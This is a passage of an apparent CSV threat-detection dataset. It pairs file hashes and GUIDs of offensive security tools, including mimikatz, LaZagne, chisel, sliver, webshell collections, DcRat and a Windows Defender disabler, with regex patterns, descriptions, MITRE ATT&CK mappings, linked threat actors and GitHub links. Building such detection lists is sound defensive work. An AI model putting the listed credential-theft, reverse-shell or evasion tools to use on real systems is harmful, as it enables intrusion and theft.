T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","#filehash","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z","30819" "*8d3af0da4c96ce9497da87a6264e081ee9119f6f82bd3923d01e40250690ab6a*",".{0,1000}8d3af0da4c96ce9497da87a6264e081ee9119f6f82bd3923d01e40250690ab6a.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30820" "*8d43a02d409a31297b2d1a997dbeaeaf10f97f499e2da819eef1318c0df652e4*",".{0,1000}8d43a02d409a31297b2d1a997dbeaeaf10f97f499e2da819eef1318c0df652e4.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","30822" "*8d525a86500b6ebf3618e9f9f5fd861cdf6a8318dba28acfa95a5c725239d015*",".{0,1000}8d525a86500b6ebf3618e9f9f5fd861cdf6a8318dba28acfa95a5c725239d015.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30823" 
"*8d7640bff1eef0a194fd9fac25355169433b53f6cc34f3eb382bc47aa448bd19*",".{0,1000}8d7640bff1eef0a194fd9fac25355169433b53f6cc34f3eb382bc47aa448bd19.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30828" "*8d7870f61a93a1466b02cad2cc5c036e1a7dc76753a6b90a38f41a6558c65146*",".{0,1000}8d7870f61a93a1466b02cad2cc5c036e1a7dc76753a6b90a38f41a6558c65146.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","30830" "*8d792ce2918767066d9de241a7479094ff84a7234957840fda5381298be9af21*",".{0,1000}8d792ce2918767066d9de241a7479094ff84a7234957840fda5381298be9af21.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","30831" "*8d7c4034043a81ba951f25cc46e7de09e10e29465a8891d9b98b25770cc48624*",".{0,1000}8d7c4034043a81ba951f25cc46e7de09e10e29465a8891d9b98b25770cc48624.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30833" "*8d8504a63c64c3cd8cd265846b04aef38128987c88bc9ca46144f85741e1fd33*",".{0,1000}8d8504a63c64c3cd8cd265846b04aef38128987c88bc9ca46144f85741e1fd33.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","30835" "*8d87231f69d0fdeb63b10141cba62e31cc0fb16a105fda66fbd77f06e9d98feb*",".{0,1000}8d87231f69d0fdeb63b10141cba62e31cc0fb16a105fda66fbd77f06e9d98feb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30836" "*8D907846-455E-39A7-BD31-BC9F81468B47*",".{0,1000}8D907846\-455E\-39A7\-BD31\-BC9F81468B47.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","30837" "*8D907846-455E-39A7-BD31-BC9F81468B47*",".{0,1000}8D907846\-455E\-39A7\-BD31\-BC9F81468B47.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","30838" "*8d944f890478ade2c832a84892373f85b54a3903bce4d0fc34f07a396736b4a5*",".{0,1000}8d944f890478ade2c832a84892373f85b54a3903bce4d0fc34f07a396736b4a5.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30839" "*8da1165d0f8bc514c82d5818ac89bb7a5e31d1f78258ac8beecb7b73fc5d857a*",".{0,1000}8da1165d0f8bc514c82d5818ac89bb7a5e31d1f78258ac8beecb7b73fc5d857a.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - 
T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","30842" "*8dac9832-d464-4916-b102-9efa913bdc44*",".{0,1000}8dac9832\-d464\-4916\-b102\-9efa913bdc44.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","30843" "*8dacc97038a845b73c4f156f3fb4d00ef5b4cfa7a8e6b10e0bd8e5c918d62fd1*",".{0,1000}8dacc97038a845b73c4f156f3fb4d00ef5b4cfa7a8e6b10e0bd8e5c918d62fd1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30844" "*8db1d4921a94819ac9222d02e9db1539d2fe613f0fe0459698f3daa3d56d934e*",".{0,1000}8db1d4921a94819ac9222d02e9db1539d2fe613f0fe0459698f3daa3d56d934e.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","30845" "*8db6879b0c3f33cf027515fb91fa397a09f2989ef9660b3243901ae38f6ace3c*",".{0,1000}8db6879b0c3f33cf027515fb91fa397a09f2989ef9660b3243901ae38f6ace3c.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","30847" "*8dbe2548630f7e261f208f203dcb96aa9bab12432a9e7c8ba49217f3268c4c24*",".{0,1000}8dbe2548630f7e261f208f203dcb96aa9bab12432a9e7c8ba49217f3268c4c24.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30848" "*8dc950cda4cee750819dbb8c1f0b3dd2ba3e8a51679854517be8f619c8e2e736*",".{0,1000}8dc950cda4cee750819dbb8c1f0b3dd2ba3e8a51679854517be8f619c8e2e736.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigation solutions (or at least some of). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","30852" "*8dca31ac3cffeacb63b9f572bb9f4b53481e51d1d74269168834c395725f0b6e*",".{0,1000}8dca31ac3cffeacb63b9f572bb9f4b53481e51d1d74269168834c395725f0b6e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30853" "*8dcbb18e02d5be2663448810946eae9f1618afebe35d779699afc9ece1bc1fcc*",".{0,1000}8dcbb18e02d5be2663448810946eae9f1618afebe35d779699afc9ece1bc1fcc.{0,1000}","offensive_tool_keyword","webshell","collection of 
webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30854" "*8dd0633df72aacd10c634a263f6b1ade7195508e79993681e0800527ddfd86ef*",".{0,1000}8dd0633df72aacd10c634a263f6b1ade7195508e79993681e0800527ddfd86ef.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#filehash","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","30856" "*8dd9febd2c4e197aa92735534aa84b224afd75366b325430964d19bbdbe7a4a8*",".{0,1000}8dd9febd2c4e197aa92735534aa84b224afd75366b325430964d19bbdbe7a4a8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30857" "*8ddfdad7d1865d85b87670ebf29a4fef1f3cc42cef56d1785c8ecc21cef6e55c*",".{0,1000}8ddfdad7d1865d85b87670ebf29a4fef1f3cc42cef56d1785c8ecc21cef6e55c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30861" "*8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE*",".{0,1000}8DE42DA3\-BE99\-4E7E\-A3D2\-3F65E7C1ABCE.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","30862" "*8de962c37d5fd876e8b402dd86e334a6ab66b6fa8242a2c8eeef4b6d1d0457ec*",".{0,1000}8de962c37d5fd876e8b402dd86e334a6ab66b6fa8242a2c8eeef4b6d1d0457ec.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30863" "*8dece0ec5b60725419e384b317c5be3c15d3cc12c1c7da28a53ec344118f9cd9*",".{0,1000}8dece0ec5b60725419e384b317c5be3c15d3cc12c1c7da28a53ec344118f9cd9.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/Notselwyn/netkit","1","0","#filehash","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","30864" "*8DED0EC8-3611-4481-88FC-14B82531FD2B*",".{0,1000}8DED0EC8\-3611\-4481\-88FC\-14B82531FD2B.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30865" "*8deed22ba3df2bf2f097be4cc94d9a17651599ccdfead82fccb85fa87c7c69e4*",".{0,1000}8deed22ba3df2bf2f097be4cc94d9a17651599ccdfead82fccb85fa87c7c69e4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30866" "*8df104dd0a3a4290bbc33eb8a98a771a8f391120f3014ccb9f2cf496561cccd4*",".{0,1000}8df104dd0a3a4290bbc33eb8a98a771a8f391120f3014ccb9f2cf496561cccd4.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","30867" "*8e029c31e7cbb4c481a10a27514bbaf746323fc251c002d132eaf374aae26206*",".{0,1000}8e029c31e7cbb4c481a10a27514bbaf746323fc251c002d132eaf374aae26206.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30868" "*8e068fd6cafac177fcf10e61a2672c0e572180bc20270e47e55525ad027d729d*",".{0,1000}8e068fd6cafac177fcf10e61a2672c0e572180bc20270e47e55525ad027d729d.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","30870" "*8e0a61ae75c32370711ca475269fb91dfeb09534a1da08a4f3f1e71c13c1eaa9*",".{0,1000}8e0a61ae75c32370711ca475269fb91dfeb09534a1da08a4f3f1e71c13c1eaa9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - 
CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30871" "*8e0accdd48e1d04e3693326de2750b1e68f75fde6e012dc195cb876088704bdb*",".{0,1000}8e0accdd48e1d04e3693326de2750b1e68f75fde6e012dc195cb876088704bdb.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","30872" "*8e1166362185fa69479caf4b8b153f06799c7143f6b726f9dc5250835f979d62*",".{0,1000}8e1166362185fa69479caf4b8b153f06799c7143f6b726f9dc5250835f979d62.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30874" "*8e122c687fec626c06bd82a2141ea1c49b262ed8e6d93b95583dbe46811b1629*",".{0,1000}8e122c687fec626c06bd82a2141ea1c49b262ed8e6d93b95583dbe46811b1629.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","30876" "*8e1f17fdae5b13fde1ce339439aad3684a758bee89941f69e00d010a6e1bdfbc*",".{0,1000}8e1f17fdae5b13fde1ce339439aad3684a758bee89941f69e00d010a6e1bdfbc.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30877" "*8e222919847637b1a4c781f780722a7ab32a1e3d310b91496fec82fa38952409*",".{0,1000}8e222919847637b1a4c781f780722a7ab32a1e3d310b91496fec82fa38952409.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30878" "*8e22b594e3d101bd26176cf972074d24f850b0f786fdb7254e452183671f03d3*",".{0,1000}8e22b594e3d101bd26176cf972074d24f850b0f786fdb7254e452183671f03d3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30879" "*8e25d415c6b4cf0960429c6c9e1ab7720d4dcd637ee15e0e13bcc82d7d7b203b*",".{0,1000}8e25d415c6b4cf0960429c6c9e1ab7720d4dcd637ee15e0e13bcc82d7d7b203b.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","30882" "*8e2f8144fae305ecff5759bb38e384682642e766dfe85179555d7b621d92b836*",".{0,1000}8e2f8144fae305ecff5759bb38e384682642e766dfe85179555d7b621d92b836.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","#filehash","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","30884" "*8e348a738400c38f4fe75a08f7b63e290f4b06204552190f910d39e24e61c89a*",".{0,1000}8e348a738400c38f4fe75a08f7b63e290f4b06204552190f910d39e24e61c89a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30890" "*8e3d537a09b98a466d58a71a21a3a9719bde8ced6344a2a0b7ef96fd6a9a06e1*",".{0,1000}8e3d537a09b98a466d58a71a21a3a9719bde8ced6344a2a0b7ef96fd6a9a06e1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
